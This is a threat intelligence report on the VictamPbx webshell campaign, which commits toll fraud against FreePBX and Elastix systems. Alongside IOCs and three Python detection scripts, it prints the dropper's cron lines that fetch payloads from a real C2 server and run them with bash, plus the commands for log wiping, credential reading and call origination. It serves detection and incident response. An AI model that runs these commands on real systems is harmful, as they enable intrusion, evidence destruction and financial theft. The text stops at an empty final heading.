
VictamPbx: Inside a Brazilian VoIP Toll Fraud Operation Targeting FreePBX and Asterisk

Investigated: March 14, 2026 | Published: March 14, 2026

Breakglass Intelligence | 2026-03-14 TLP: WHITE


TL;DR

Four samples of the same Bash dropper -- all named k.php, all exactly 19,499 bytes -- were submitted to MalwareBazaar within hours of each other on March 14, 2026. Each deploys a PHP webshell called VictamPbx to a dozen paths inside FreePBX and Elastix installations, steals admin credentials from the local SQLite database, hijacks PBX admin sessions, and hands the operator a one-click interface to originate outbound telephone calls through the victim's SIP trunks. The objective is International Revenue Share Fraud (IRSF) -- toll fraud at scale.

All four samples phone home to the same C2 server at 45.234.176.202 in Salvador, Bahia, Brazil, hosted by MAFREDINE TELECOMUNICACOES EIRELI (AS267369). That server is itself running Asterisk 13.35.0. The attacker is operating their command-and-control infrastructure on top of the same VoIP software they are exploiting in victims -- a compromised PBX being used to compromise more PBXes.

The four samples are not identical. Each embeds a different MD5 password hash for webshell authentication and a different operator IP address in an HTML comment -- a persistent OPSEC mistake that reveals the actor accessing their tooling from T-Mobile USA, AT&T in Houston, a Swiss VPN provider, and a UK hosting network. This pattern is consistent with a single operator generating per-target or per-batch variants of the same toolkit, each time inadvertently baking their current egress IP into the webshell source code.

A related sibling sample (71d94479...) was first observed in late January 2026 with additional sudo and persistence tags, and the C2 domain razatelefonia.pro was registered in May 2023. This campaign has been running for years.


The Dropper: A Bash Script in PHP Clothing

The outer file is named k.php but contains no PHP. It is a Bash shell script -- the .php extension likely exists so it can be served or triggered through a PHP-enabled web server. All four samples are structurally identical: 28-29 lines of Bash, three base64-encoded payload blobs, and a deployment routine that targets every standard FreePBX web directory.

The dropper executes in three phases.

Phase one decodes the primary webshell and copies it to at least twelve filesystem locations:

/var/www/html/admin/views/ajax.php          (primary drop)
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php

The directories that do not already exist -- digium_phones, rest_phones, fpbxphones, and others -- are created with mkdir -p before the copy. These paths correspond to real FreePBX phone provisioning module directories (Digium phones, REST phones, etc.), so the webshell blends into the filesystem. The attacker is targeting every module directory that a FreePBX update might leave intact.

After deployment, the dropper runs touch ajax.php -r footer.php to clone the modification timestamp from a legitimate FreePBX file onto the webshell. In a directory listing, the webshell will appear to have the same age as the system files around it. This is textbook timestomping.

A malicious .htaccess file is also dropped into /var/www/html/admin/views/ with mod_rewrite rules that route unmatched requests to config.php, ensuring the webshell remains reachable even if the exact filename is blocked or the web server configuration changes.

Phase two decodes a secondary shell script and executes it from two locations -- /tmp/test.sh and /var/spool/asterisk/tmp/test.sh -- for redundancy. This script performs basic reconnaissance (cat /etc/passwd, ls -ls /home), writes a trigger file to /usr/local/asterisk/ha_trigger (possibly to interact with Asterisk's High Availability clustering), and drops a PHP-based downloader called license.php into the FreePBX HA module directory at /var/www/html/admin/modules/freepbx_ha/. The HA module path is clever: it is a legitimate FreePBX directory that administrators are unlikely to audit manually.

Phase three establishes persistence through cron. The initial cron job fetches a fresh copy of k.php from the C2 every three minutes, saving it to /var/lib/asterisk/bin/devnull -- a path chosen to look like a system utility in a directory that Asterisk owns. The license.php payload then layers on three additional cron entries at one-minute intervals, pulling both k.php and a secondary payload (/new/c) from the C2:

*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
*/1 * * * * wget http://45.234.176.202/new/c -O /var/lib/asterisk/bin/devnull23; bash /var/lib/asterisk/bin/devnull23
*/1 * * * * wget http://45.234.176.202/new/c -O /trmp/devnull24; bash /tmp/devnull24

Note the typo in the third entry: /trmp/devnull24 instead of /tmp/devnull24. The write goes to a nonexistent directory and silently fails, but the bash execution path references the correct /tmp/devnull24. This kind of mistake -- present identically across all four samples -- suggests manual script editing rather than an automated build pipeline.

Before exiting, license.php runs sed -i '/restapps/d' /var/log/httpd/* to strip every Apache log line containing "restapps" from the access logs. The FreePBX REST Phone Apps module generates these log entries, and the attacker knows their webshell activity produces them. This is targeted log tampering -- removing only the evidence of their own access while leaving everything else intact to avoid triggering log integrity alerts.


The Webshell: VictamPbx

Beneath the obfuscation -- triple-layered base64 encoding interleaved with randomized PHP comment tokens to break signature detection -- the VictamPbx webshell is a purpose-built VoIP administration backdoor. It is not a general-purpose webshell adapted for PBX systems. Every feature targets FreePBX and Elastix specifically.

Authentication

The webshell gates access behind an MD5 challenge. The operator submits a plaintext password, the webshell computes md5($input), and compares it against a hardcoded hash. Each of the four samples uses a different hash:

Sample SHA256 | Webshell Password MD5 Hash
d05fecfd...   | 721f1c19a9af666bfe70e0c0058aad96
07adbfa4...   | 721f1c19a9af666bfe70e0c0058aad96
751c9590...   | f7c6685b6569e639a939cc164fa087c5
0b6568e6...   | 7720ac7830299010e1b4a8157ba0c85e

Two samples share the same hash, suggesting they were generated in the same batch. The other two have unique hashes, implying per-deployment or per-target password rotation. The session variable $_SESSION['looki'] is consistent across all variants -- a stable fingerprint for detection.

Once authenticated, the operator sees a panel titled "VictamPbx" with pre-populated command buttons for common VoIP reconnaissance:

  • ls -la -- directory listing
  • ps -aux --forest -- process tree
  • asterisk -rx 'core show channels' -- active call enumeration
  • asterisk -rx 'sip show peers' -- SIP trunk listing
  • cat /etc/elastix.conf -- Elastix credentials
  • cat /etc/asterisk/sip_additional.conf -- SIP peer credentials
  • cat /etc/asterisk/extensions_custom.conf -- dial plan
  • cat /etc/amportal.conf -- FreePBX database credentials

Every one of these commands serves the toll fraud objective. The operator needs to know what SIP trunks are available, what dial contexts exist, and what credentials give them access to the PBX configuration.

Credential Theft and Session Hijacking

The webshell includes two authentication bypass modules -- one for Elastix, one for FreePBX.

The Elastix bypass queries the local SQLite database directly:

SELECT name, md5_password, extension FROM acl_user WHERE id = '1'

This extracts the primary administrator username, their MD5-hashed password, and their PBX extension number. The webshell then sets itself up as a valid Elastix session, redirecting the operator to the Elastix admin panel as a fully authenticated administrator.

The FreePBX bypass loads the FreePBX configuration file (/etc/freepbx.conf or /etc/asterisk/freepbx.conf), instantiates an ampuser object with the database admin credentials, calls setAdmin() to grant full privileges, and redirects to the FreePBX admin panel. The operator is now the PBX administrator without ever needing to know a password.

Toll Fraud: The Money Shot

The webshell includes a CALL form that constructs and executes an Asterisk CLI command:

asterisk -rx "channel originate Local/<prefix><number>@<context> application wait <seconds>"

The defaults are telling: the country prefix is 00 (the international dialing prefix used in Brazil and most of Latin America), and the default dial context is asterisk-outcalls (the standard FreePBX outbound routing context). The operator enters a phone number, a call duration, and clicks a button. The victim's PBX places the call. The victim pays the bill.

This is International Revenue Share Fraud. The attacker controls or has an arrangement with premium-rate numbers in high-cost destinations. Every call the victim's PBX places to those numbers generates revenue that flows back to the attacker. A single compromised PBX with multiple SIP trunks can generate thousands of dollars in fraudulent calls per hour.
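The originate command above leaves a recognisable trace in the Asterisk CDR: a Local/ channel into the outbound context, parked in Wait() rather than dialled by a user, to a 00-prefixed number. The following is an added example (not code from the report or the actor's tooling) that runs that check over constructed Master.csv-style CDR lines; the `asterisk-outcalls` context and `00` prefix are the webshell defaults from the text, and the CDR rows themselves are made up.

```python
import csv
import io
from collections import Counter

# Column order of Asterisk's stock cdr_csv Master.csv
FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel", "dstchannel",
          "lastapp", "lastdata", "start", "answer", "end", "duration", "billsec",
          "disposition", "amaflags", "uniqueid", "userfield"]

# Constructed CDR lines: two normal extension-to-PSTN calls plus three legs shaped like what
# "channel originate Local/00...@asterisk-outcalls application wait 600" leaves behind.
SAMPLE_CDR = '''\
"","101","5551234","from-internal","""Alice"" <101>","SIP/101-00000001","SIP/trunk-00000002","Dial","SIP/trunk/5551234,300","2026-03-14 09:02:11","2026-03-14 09:02:15","2026-03-14 09:05:40","209","205","ANSWERED","DOCUMENTATION","1773478931.1",""
"","","0025267812345","asterisk-outcalls","","Local/0025267812345@asterisk-outcalls-00000003;2","SIP/trunk-00000004","Wait","600","2026-03-14 03:41:02","2026-03-14 03:41:09","2026-03-14 03:51:09","607","600","ANSWERED","DOCUMENTATION","1773459662.3",""
"","","0025267812346","asterisk-outcalls","","Local/0025267812346@asterisk-outcalls-00000005;2","SIP/trunk-00000006","Wait","600","2026-03-14 03:41:03","2026-03-14 03:41:10","2026-03-14 03:51:10","607","600","ANSWERED","DOCUMENTATION","1773459663.5",""
"","102","5559876","from-internal","""Bob"" <102>","SIP/102-00000007","SIP/trunk-00000008","Dial","SIP/trunk/5559876,300","2026-03-14 10:15:00","2026-03-14 10:15:04","2026-03-14 10:16:30","90","86","ANSWERED","DOCUMENTATION","1773483300.7",""
"","","0088212345678","asterisk-outcalls","","Local/0088212345678@asterisk-outcalls-00000009;2","SIP/trunk-00000010","Wait","600","2026-03-14 03:41:05","","2026-03-14 03:41:35","30","0","NO ANSWER","DOCUMENTATION","1773459665.9",""
'''


def parse_cdr(text):
    """Return Master.csv rows as dicts, skipping malformed lines."""
    rows = []
    for rec in csv.reader(io.StringIO(text)):
        if len(rec) == len(FIELDS):
            rows.append(dict(zip(FIELDS, rec)))
    return rows


def flag_irsf(rows, outbound_context="asterisk-outcalls", intl_prefix="00"):
    """Flag CDRs that look CLI-originated toward international destinations.
    Each heuristic alone can be benign; two or more together deserve a look."""
    flagged = []
    for r in rows:
        reasons = []
        if r["channel"].startswith("Local/"):
            reasons.append("Local/ channel: originated from CLI/AMI, not a registered endpoint")
        if r["lastapp"].lower() == "wait":
            reasons.append("leg parked in Wait() instead of a Dial() from a user")
        if r["dcontext"] == outbound_context and r["dst"].startswith(intl_prefix):
            reasons.append(f"international number via {outbound_context}")
        if not r["src"]:
            reasons.append("empty source / caller id")
        if len(reasons) >= 2:
            flagged.append({"uniqueid": r["uniqueid"], "dst": r["dst"],
                            "billsec": int(r["billsec"] or 0), "reasons": reasons})
    return flagged


def destination_bursts(flagged, prefix_len=5):
    """Count flagged calls per destination prefix; IRSF tends to hammer one number range."""
    return Counter(f["dst"][:prefix_len] for f in flagged)


def summarize(text):
    flagged = flag_irsf(parse_cdr(text))
    return {"flagged": len(flagged),
            "billed_seconds": sum(f["billsec"] for f in flagged),
            "bursts": dict(destination_bursts(flagged))}


if __name__ == "__main__":
    for f in flag_irsf(parse_cdr(SAMPLE_CDR)):
        print(f["uniqueid"], f["dst"], f["billsec"], "|", "; ".join(f["reasons"]))
    print(summarize(SAMPLE_CDR))
```

Point `parse_cdr` at the real `/var/log/asterisk/cdr-csv/Master.csv` and adjust `outbound_context` to your own outbound route context if it differs.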


The C2: A PBX Running C2 for Other PBXes

The command-and-control server at 45.234.176.202 is hosted by MAFREDINE TELECOMUNICACOES EIRELI (AS267369) in Salvador, Bahia, Brazil. Its reverse DNS is 202-176-234-45.mafredine.com.br, and it serves web content titled "Raza Telefonia" on ports 80 and 443 via Apache 2.4.56.

The critical finding is port 8089: Asterisk/13.35.0. This is the Asterisk REST Interface (ARI) / HTTP management port. The C2 server is itself a FreePBX or Asterisk installation -- either a compromised victim repurposed as infrastructure, or the attacker's own PBX set up for the operation. Given that the domain razatelefonia.pro (Portuguese: "Raza Telephony") was registered in May 2023 and has active subdomains for CRM, mail, text-to-speech, and a panel, this appears to be the attacker's own telephony operation rather than a hijacked server.

A secondary server at 45.234.176.67 on the same ASN hosts additional infrastructure: Portainer 2.27.6 (Docker container management), MySQL 5.7.44, Redis, RabbitMQ management, and its own Asterisk instance on port 8089. Associated hostnames include admin.depp.com.br and cadastro.workchat.pro. This looks like a full-stack telephony CRM and call-routing platform -- the operational backend of a VoIP fraud business.

The network block 45.234.176.0/22 is owned by MAFREDINE, with nameservers at ns1.mafredine.com.br (45.234.176.133) and ns2.mafredine.com.br (45.234.176.134). The LACNIC/registro.br WHOIS record names ADENILTON DA PAIXAO RIBEIRO as the responsible party, with CNPJ 11.682.420/0001-01.

Domain Infrastructure

Certificate Transparency logs for razatelefonia.pro reveal a steady cadence of Let's Encrypt certificate issuances, with the most recent for crm.razatelefonia.pro issued on 2026-03-13 -- the day before all four samples appeared on MalwareBazaar:

Subdomain                    | Latest Certificate | Purpose
crm.razatelefonia.pro        | 2026-03-13         | CRM system / active C2
oratotext.razatelefonia.pro  | 2026-03-08         | Text-to-speech / IVR
www.razatelefonia.pro        | 2026-03-08         | Web frontend
razatelefonia.pro            | 2026-03-08         | Main domain
mail.razatelefonia.pro       | 2026-01-23         | Mail server
painel.razatelefonia.pro     | 2026-01-12         | Panel / admin interface
megabahia.razatelefonia.pro  | 2026-01-12         | Regional marker (Bahia, Brazil)
depp.razatelefonia.pro       | 2026-01-13         | Unknown

The painel (Portuguese for "panel") and megabahia ("mega Bahia") subdomains reinforce the Brazilian origin. The domain was registered through Hostinger on 2023-05-13 with redacted WHOIS.


OPSEC Failures: Four Samples, Four Operator IPs

The most significant finding across the four samples is the consistent OPSEC mistake of embedding an IP address in an HTML comment within the webshell login page. Each sample contains this pattern:

echo '<? --  ((/*<IP_ADDRESS>*/)) -- ?>';

The IPs differ across samples:

Sample      | Embedded IP    | ASN                                 | Location
d05fecfd... | 85.195.233.39  | AS13030 -- Init7 (Switzerland) Ltd. | Switzerland
07adbfa4... | 85.199.233.39  | AS9009 -- M247 Ltd                  | United Kingdom
751c9590... | 172.56.33.182  | AS21928 -- T-Mobile USA, Inc.       | United States
0b6568e6... | 162.205.106.30 | AS7018 -- AT&T                      | Houston, TX, USA

This pattern tells a story. The Swiss and UK IPs (Init7 and M247) are VPN and hosting providers commonly used for anonymization. The T-Mobile and AT&T IPs are residential or mobile connections. The most likely explanation is that the operator generates each webshell variant from their current network location, and their egress IP is captured into the template at build time. They either do not know the IP is being embedded, or they do not care enough to strip it.

The T-Mobile mobile IP and the AT&T residential IP in Houston are particularly valuable for attribution. They suggest the operator -- or at least one member of the operation -- has a physical presence in the United States and accesses the toolkit from consumer internet connections, not just commercial VPN services.
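The fingerprints described in the Authentication section ($_SESSION['looki'], the VictamPbx panel name, the hardcoded MD5 hashes) and the operator-IP comment above are all recoverable once the base64 layers are peeled, so a scanner does not need a signature on the encoded blob. The following is an added example, not code from the report or the actor's toolkit: it strips the junk comment tokens, decodes up to three base64 layers, and scores each layer against those fingerprints. The obfuscated sample it scans is constructed here as an imitation of the encoding described in the text (a login fragment only, with no command execution), not the real dropper's blob.

```python
import base64
import re

# Fingerprints from the VictamPbx analysis: session marker, panel name, hardcoded login
# hashes, and the operator-IP leak of the form  echo '<? --  ((/*1.2.3.4*/)) -- ?>';
KNOWN_PASSWORD_HASHES = {"721f1c19a9af666bfe70e0c0058aad96",
                         "f7c6685b6569e639a939cc164fa087c5",
                         "7720ac7830299010e1b4a8157ba0c85e"}
SESSION_MARKER = "$_SESSION['looki']"
PANEL_NAME = "VictamPbx"
OPERATOR_IP_RE = re.compile(r"\(\(\s*/\*\s*(\d{1,3}(?:\.\d{1,3}){3})\s*\*/\s*\)\)")
MD5_LITERAL_RE = re.compile(r"\b[0-9a-f]{32}\b")
COMMENT_TOKEN_RE = re.compile(r"/\*.*?\*/", re.S)   # the randomized junk comments
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def peel_layers(text, max_depth=3):
    """Return the text plus each base64 layer beneath it (junk comments stripped first)."""
    layers, current = [text], text
    for _ in range(max_depth):
        runs = B64_RUN_RE.findall(COMMENT_TOKEN_RE.sub("", current))
        if not runs:
            break
        try:
            current = base64.b64decode(max(runs, key=len), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


def scan_source(text):
    """Score a PHP source for VictamPbx fingerprints across all decoded layers."""
    f = {"session_marker": False, "panel_name": False, "known_hashes": set(),
         "operator_ips": set(), "layers": 0}
    for layer in peel_layers(text):
        f["layers"] += 1
        f["operator_ips"].update(OPERATOR_IP_RE.findall(layer))  # before comment stripping
        clean = COMMENT_TOKEN_RE.sub("", layer)
        f["session_marker"] |= SESSION_MARKER in clean
        f["panel_name"] |= PANEL_NAME in clean
        f["known_hashes"].update(set(MD5_LITERAL_RE.findall(clean)) & KNOWN_PASSWORD_HASHES)
    score = (2 * f["session_marker"] + 2 * f["panel_name"]
             + 3 * bool(f["known_hashes"]) + bool(f["operator_ips"]))
    f["verdict"] = "VictamPbx" if score >= 3 else "clean"
    return f


# Constructed stand-in for the webshell's login fragment (no command execution included)
INNER_FRAGMENT = ("<?php session_start();\n"
                  "if (md5($_POST['pass']) == '721f1c19a9af666bfe70e0c0058aad96') "
                  "{ $_SESSION['looki'] = 'logged'; }\n"
                  "echo '<? --  ((/*85.195.233.39*/)) -- ?>';\n"
                  "echo '<input type=\"submit\" value=\"VictamPbx\">';\n")


def obfuscate_for_demo(plain, layers=3, chunk=40):
    """Constructed imitation of the dropper's encoding: base64 applied three times,
    with junk comment tokens spliced into the outer blob every `chunk` characters."""
    data = plain.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    blob = data.decode()
    spliced = "".join(blob[i:i + chunk] + f"/*t{i}*/" for i in range(0, len(blob), chunk))
    return "<?php $p = '" + spliced + "';\n"


if __name__ == "__main__":
    print(scan_source(obfuscate_for_demo(INNER_FRAGMENT)))
```

Run `scan_source` over the contents of every .php file under /var/www/html to triage a suspected PBX; the extracted operator IP is an attribution artifact worth recording alongside the file hash.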


Attribution Assessment

Confidence: MEDIUM

This is a financially motivated VoIP toll fraud operation with deep expertise in FreePBX, Elastix, and Asterisk internals. The evidence points to a Brazilian or Brazilian-affiliated operator:

  • C2 infrastructure is hosted on a Brazilian telecom ISP (MAFREDINE, Salvador, Bahia)
  • The C2 domain razatelefonia.pro is Portuguese ("Raza Telephony")
  • The subdomain megabahia references the Bahia state of Brazil
  • The subdomain painel uses the Portuguese spelling of "panel"
  • The webshell name "VictamPbx" appears to be Portuguese-influenced ("victam" as a variant of "vitima" / "victim")
  • The default international dialing prefix in the webshell is 00, consistent with Brazilian telephony conventions
  • The LACNIC registrant for the /22 block is ADENILTON DA PAIXAO RIBEIRO

The operation has characteristics of a small fraud shop rather than a sophisticated APT. The codebase shows manual editing (typos like /trmp/), inconsistent obfuscation patterns, and basic operational security. The per-sample password rotation and multi-path deployment show some awareness of detection risk, but the embedded operator IPs and stable C2 infrastructure suggest the actor does not expect to be hunted.

The razatelefonia.pro infrastructure -- with its CRM, IVR/text-to-speech, mail server, panel, and RabbitMQ-backed call routing -- looks less like a one-off C2 and more like the production platform of a fraudulent telecommunications business.


IOCs

File Indicators

SHA256 | MD5 | First Seen | VT Detections
d05fecfdf187e28b21ac5e5df5659f10a5e5a23eeb638440ca93789c721a9d5a | bf93b64f89338ae6e1f345d5fdf75f85 | 2026-03-14 08:50 UTC | 18/76
07adbfa4138c9afc8a974c815eeb17f3d6ef9479881bdbbcba4439d26d96bfd0 | 34deee0d6adb320910d583325e844342 | 2026-03-14 03:33 UTC | 24/76
751c9590219f90c83abcd37d32f8c3c24af2b634d83ed8f55f800d38e8a00c7f | 9f29901cb5d351c47726dcb59941770f | 2026-03-14 02:44 UTC | 23/76
0b6568e67e4545d2ed31b91a09fd8768d8241321c13f9acc06f38ff1a3f91f53 | 057a4d214929df3aad6b5ce79f3e4cd9 | 2026-03-14 05:16 UTC | 19/76
71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302 | 5056a28d3b582277a979f584118f7f69 | ~2026-01-28 | 25/76

All four primary samples are 19,499 bytes, file type Bash shell script, filename k.php. Common AV detections: Linux.MulDrop.187 (DrWeb), HEUR:Trojan-Downloader.Shell.Agent.bc (Kaspersky), Linux/Agent.OG (ESET), BASH/EncystPHP.A!tr (Fortinet).

The fifth hash (71d94479...) is a sibling sample first seen in late January 2026 with additional sudo and persistence tags, likely representing the /new/c secondary payload or an earlier campaign iteration.

Network Indicators

Indicator | Type | Context
45[.]234[.]176[.]202 | IPv4 | Primary C2, payload host, Asterisk 13.35.0 on port 8089
45[.]234[.]176[.]67 | IPv4 | Secondary infrastructure (Portainer, MySQL, Redis, RabbitMQ, Asterisk)
razatelefonia[.]pro | Domain | C2 domain (VT: 12/94 malicious)
crm[.]razatelefonia[.]pro | Domain | Active C2 hostname
mafredine[.]com[.]br | Domain | ISP/hosting provider domain
hxxp://45[.]234[.]176[.]202/new/k[.]php | URL | Dropper re-download / persistence callback
hxxp://45[.]234[.]176[.]202/new/c | URL | Secondary payload download
85[.]195[.]233[.]39 | IPv4 | Operator IP -- Init7 Switzerland (embedded in sample d05fecfd)
85[.]199[.]233[.]39 | IPv4 | Operator IP -- M247 UK (embedded in sample 07adbfa4)
172[.]56[.]33[.]182 | IPv4 | Operator IP -- T-Mobile USA (embedded in sample 751c9590)
162[.]205[.]106[.]30 | IPv4 | Operator IP -- AT&T Houston TX (embedded in sample 0b6568e6)
AS267369 | ASN | MAFREDINE TELECOMUNICACOES EIRELI, Salvador, Brazil

Webshell Artifacts

Artifact | Value
Webshell name | VictamPbx (form submit button and panel title)
Session variable | $_SESSION['looki'] = 'logged'
MD5 password hashes | 721f1c19a9af666bfe70e0c0058aad96, f7c6685b6569e639a939cc164fa087c5, 7720ac7830299010e1b4a8157ba0c85e
RCE parameter | cmd (or cVd in variant 07adbfa4)
Call parameter | call (or cal, in variant 07adbfa4)
Elastix bypass | ?admin=Elastix (or ?admin=FtV^ictamPbx in variant 07adbfa4)
FreePBX bypass | ?admin=Freepbx (or ?admin=FtV^ictamPbx in variant 07adbfa4)
Default dial context | asterisk-outcalls
Default country prefix | 00

Filesystem Indicators

/var/www/html/admin/views/ajax.php
/var/www/html/admin/views/.htaccess
/var/www/html/admin/modules/core/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/rest_phones/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
/var/www/html/admin/modules/freepbx_ha/license.php
/var/www/html/admin/modules/freepbx_ha/license
/var/lib/asterisk/bin/devnull
/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull23
/usr/local/asterisk/ha_trigger

Cron Persistence Patterns

*/3 * * * * chmod +x /var/lib/asterisk/bin/devnull; /var/lib/asterisk/bin/devnull
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
*/1 * * * * wget http://45.234.176.202/new/c -O /var/lib/asterisk/bin/devnull23; bash /var/lib/asterisk/bin/devnull23

MITRE ATT&CK Mapping

Tactic | Technique | ID | Implementation
Initial Access | Exploit Public-Facing Application | T1190 | FreePBX/Elastix web interface exploitation
Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 | Multi-stage Bash dropper
Execution | Command and Scripting Interpreter: PHP | T1059.006 | VictamPbx PHP webshell
Persistence | Server Software Component: Web Shell | T1505.003 | Webshell deployed to 12+ FreePBX paths
Persistence | Scheduled Task/Job: Cron | T1053.003 | 4 redundant cron entries at 1-3 minute intervals
Defense Evasion | Obfuscated Files or Information | T1027 | Triple base64, PHP comment token obfuscation
Defense Evasion | Indicator Removal: Timestomp | T1070.006 | touch -r footer.php ajax.php
Defense Evasion | Indicator Removal: Clear Linux or Mac System Logs | T1070.002 | sed -i '/restapps/d' /var/log/httpd/*
Defense Evasion | Indicator Removal: File Deletion | T1070.004 | Self-deleting stage scripts from /tmp
Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | Payloads named devnull, devnull2, devnull23 in Asterisk dirs
Credential Access | Credentials from Password Stores | T1555 | SQLite query against Elastix /var/www/db/acl.db
Credential Access | Unsecured Credentials: Credentials In Files | T1552.001 | Reads /etc/amportal.conf, /etc/elastix.conf
Privilege Escalation | Valid Accounts | T1078 | FreePBX setAdmin() session hijack via AMPDBUSER
Discovery | System Owner/User Discovery | T1033 | cat /etc/passwd
Discovery | File and Directory Discovery | T1083 | ls -ls /home
Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | HTTP-based C2 payload delivery
Command and Control | Ingress Tool Transfer | T1105 | wget and curl used redundantly
Impact | Financial Theft | T1657 | asterisk -rx "channel originate" for IRSF toll fraud

Recommendations

Immediate (24-48 hours)

  • Search all FreePBX web directories for ajax.php files that are not part of the original installation. Pay particular attention to the twelve paths listed above.
  • Inspect crontabs for all users -- especially root, asterisk, and www-data -- for entries referencing 45.234.176.202, devnull, or /var/lib/asterisk/bin/.
  • Block 45.234.176.202 at the network perimeter. Consider blocking the entire AS267369 (45.234.176.0/22) if your organization has no legitimate business with MAFREDINE TELECOMUNICACOES.
  • Review Asterisk CDR (Call Detail Records) for unauthorized outbound calls, particularly to international premium-rate numbers. Look for calls originated via the asterisk-outcalls context that do not correspond to known user activity.
  • Check /var/log/httpd/ for evidence of log tampering. If access logs show gaps or if lines containing "restapps" are absent despite active REST Phone Apps usage, assume the system has been compromised.
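The crontab and access-log checks above (and the phase-three persistence and restapps log tampering described in the dropper section) reduce to a few pattern matches. The following is an added example, not code from the report or the actor's tooling, that runs them over constructed crontab and Apache log text; the webshell paths, C2 address and stager names are the report's own indicators, while the sample entries and log lines are made up for the demonstration.

```python
import re

# Indicators from the report (extend with your own)
C2_INDICATORS = ("45.234.176.202", "razatelefonia.pro")
STAGER_PATH_RE = re.compile(r"/var/lib/asterisk/bin/devnull\w*|/tr?mp/devnull\w*")
FETCH_AND_RUN_RE = re.compile(r"\b(?:wget|curl)\b[^;|&]*[;|&]+\s*(?:ba)?sh\b")
# Every path the dropper and license.php stage write to under /var/www/html
WEBSHELL_PATHS = {
    "/admin/views/ajax.php", "/admin/modules/core/ajax.php", "/admin/assets/ajax.php",
    "/admin/assets/config.php", "/admin/assets/js/config.php", "/rest_phones/ajax.php",
    "/digium_phones/ajax.php", "/digium_phoness/ajax.php", "/phones/ajax.php",
    "/fpbxphones/ajax.php", "/freepbxphones/ajax.php", "/freepbx/ajax.php",
    "/admin/modules/freepbx_ha/license.php",
}
APACHE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def flag_crontab(text):
    """Flag crontab entries that match the campaign's persistence pattern."""
    flagged = []
    for raw in text.splitlines():
        line = raw.strip()
        parts = line.split(None, 5)
        if not line or line.startswith("#") or len(parts) < 6 or "=" in parts[0]:
            continue  # blanks, comments, env assignments, @reboot-style lines
        schedule, command = " ".join(parts[:5]), parts[5]
        reasons = []
        if any(ind in command for ind in C2_INDICATORS):
            reasons.append("references known C2")
        if STAGER_PATH_RE.search(command):
            reasons.append("uses devnull stager path")
        if FETCH_AND_RUN_RE.search(command):
            reasons.append("download-then-execute")
        m = re.fullmatch(r"\*/(\d+)", parts[0])
        if m and int(m.group(1)) <= 3:
            reasons.append(f"runs every {m.group(1)} minute(s)")
        if reasons:
            flagged.append({"schedule": schedule, "command": command, "reasons": reasons})
    return flagged


def audit_access_log(text):
    """Find hits on the dropped webshell paths and count 'restapps' lines, which license.php
    deletes; zero such lines on a PBX that actually uses REST Phone Apps is a red flag."""
    hits, restapps = [], 0
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        restapps += "restapps" in line
        path = m.group("path").split("?", 1)[0]
        if path in WEBSHELL_PATHS:
            hits.append((m.group("ip"), m.group("method"), path, m.group("status")))
    return {"webshell_hits": hits, "restapps_lines": restapps,
            "possible_restapps_purge": restapps == 0}


SAMPLE_CRONTAB = """\
MAILTO=root
# legitimate housekeeping
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/3 * * * * chmod +x /var/lib/asterisk/bin/devnull; /var/lib/asterisk/bin/devnull
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; bash /var/lib/asterisk/bin/devnull2
*/1 * * * * wget http://45.234.176.202/new/c -O /trmp/devnull24; bash /tmp/devnull24
"""
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2026:03:35:10 +0000] "GET /admin/config.php?display=dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
85.195.233.39 - - [14/Mar/2026:03:36:02 +0000] "POST /admin/views/ajax.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
85.195.233.39 - - [14/Mar/2026:03:36:40 +0000] "GET /rest_phones/ajax.php?admin=Freepbx HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Mar/2026:03:37:15 +0000] "GET /admin/ajax.php?module=core&command=getJSON HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(flag_crontab(SAMPLE_CRONTAB))
    print(audit_access_log(SAMPLE_LOG))
```

Feed `flag_crontab` the output of `crontab -l -u <user>` for root, asterisk and www-data plus the contents of /etc/cron.d, and `audit_access_log` each file under /var/log/httpd/.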

Short-term (1-2 weeks)

  • Rotate all credentials: Elastix admin passwords, FreePBX admin passwords, SIP peer credentials, AMPORTAL database credentials. Assume the SQLite ACL database and all configuration files have been exfiltrated.
  • Restrict the FreePBX admin panel to trusted IP addresses via firewall rules. The /admin/ path should never be directly accessible from the internet.
  • Deploy file integrity monitoring on FreePBX web directories. Alert on any new .php file creation or .htaccess modification.
  • Hunt for the string VictamPbx in web server files, HTTP request logs, and bash history across all VoIP infrastructure.

Medium-term (1-3 months)

